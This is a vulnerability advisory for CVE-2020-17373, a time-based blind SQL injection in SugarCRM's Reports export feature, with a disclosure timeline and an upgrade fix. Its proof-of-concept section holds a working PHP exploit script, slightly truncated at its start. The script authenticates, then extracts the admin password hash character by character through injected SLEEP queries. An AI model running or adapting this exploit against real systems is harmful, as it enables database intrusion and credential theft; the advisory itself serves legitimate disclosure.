SugarCRM SQL Injection

`SugarCRM < 10.1.0 (Reports Export) SQL Injection Vulnerability  
  
*• Software Link:*  
  
https://www.sugarcrm.com  
  
*• Affected Versions:*  
  
All versions prior to 10.1.0 (Q3 2020).  
  
*• Vulnerability Description:*  
  
User input passed through the encoded “current_post” parameter to  
‘index.php’ (when “entryPoint” is set to “export” and “module” is set to  
“Reports”) is not properly sanitized before being used to construct a SQL  
query. This can be exploited by remote attackers to e.g. read sensitive  
data from the database through e.g. time-based SQL Injection attacks.  
  
*• Proof of Concept:*  
  
http://karmainsecurity.com/pocs/CVE-2020-17373  
  
-- start poc --  
  
\n"; print "\nExample....: php $argv[0] http://localhost/sugarcrm/ sarah sarah"; print "\nExample....: php $argv[0] https://test.trial.sugarcrm.eu/ jim jim\n\n"; die(); } list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]]; print "[-] Logging in with username '{$user}' and password '{$pass}'\n"; $ch = curl_init(); $params = ["username" => $user, "password" => $pass, "grant_type" => "password", "client_id" => "sugar"]; curl_setopt($ch, CURLOPT_URL, "{$url}rest/v10/oauth2/token"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($params)); curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json"]); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_TIMEOUT, 3); if (($token = (json_decode(curl_exec($ch)))->access_token) == null) die("[-] Login failed!\n"); print "[-] Retrieving PHPSESSID cookie...\n"; curl_setopt($ch, CURLOPT_URL, "{$url}rest/v10/oauth2/bwc/login"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, ""); curl_setopt($ch, CURLOPT_HTTPHEADER, ["OAuth-Token: {$token}"]); curl_setopt($ch, CURLOPT_HEADER, true); if (!preg_match("/PHPSESSID=([^;]+);/", curl_exec($ch), $sid)) die("[-] Session ID not found!\n"); curl_setopt($ch, CURLOPT_POST, false); curl_setopt($ch, CURLOPT_HTTPHEADER, ["Cookie: PHPSESSID={$sid[1]}", "Referer: {$url}"]); print "[-] Starting time-based Blind SQL Injection attack...\n"; $chars = [0x2e, 0x2f]; // slash and dot $chars = array_merge($chars, range(48, 57)); // 0-9 $chars = array_merge($chars, range(65, 90)); // A-Z $chars = array_merge($chars, range(97, 122)); // a-z $index = 8; $hash = "$2y$10$"; $sql = "(SELECT IF(ORD(SUBSTR(user_hash,%d,1))=%d,SLEEP(3),0) FROM users LIMIT 1"; while ($index <= 60) { for ($i = 0, $n = count($chars); $i <= $n; $i++) { if ($i == $n) die("\n[-] Exploit failed :(\n"); print "\r[-] The admin's password hash is: {$hash}".chr($chars[$i]); $s = sprintf($sql, $index, $chars[$i]); $s = base64_encode(serialize(["team_id" => "1) AND {$s}"])); curl_setopt($ch, CURLOPT_URL, "{$url}index.php?entryPoint=export&module=Reports¤t_post={$s}"); $start = get_time(); curl_exec($ch); if ((get_time() - $start) >= 3) { $hash .= chr($chars[$i]); break; } } $index++; } print "\n[-] Done!\n";   
  
-- end poc --  
  
*• Solution:*  
  
Upgrade to version 10.1.0 (Q3 2020) or later.  
  
*• Disclosure Timeline:*  
  
[05/02/2020] – Vendor notified  
[06/02/2020] – Automatic vendor response received  
[26/03/2020] – Vendor contacted again; no response  
[17/04/2020] – Vendor contacted again; no response  
[18/06/2020] – Vendor notified about a 180-day disclosure deadline  
[03/08/2020] – After around 180 days the vendor silently fix the issue  
[06/08/2020] – CVE number assigned  
[10/08/2020] – Public disclosure  
  
*• CVE Reference:*  
  
The Common Vulnerabilities and Exposures project (cve.mitre.org)  
has assigned the name CVE-2020-17373  
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-17373> to this  
vulnerability.  
  
*• Credits:*  
  
Vulnerability discovered by Egidio Romano.  
  
`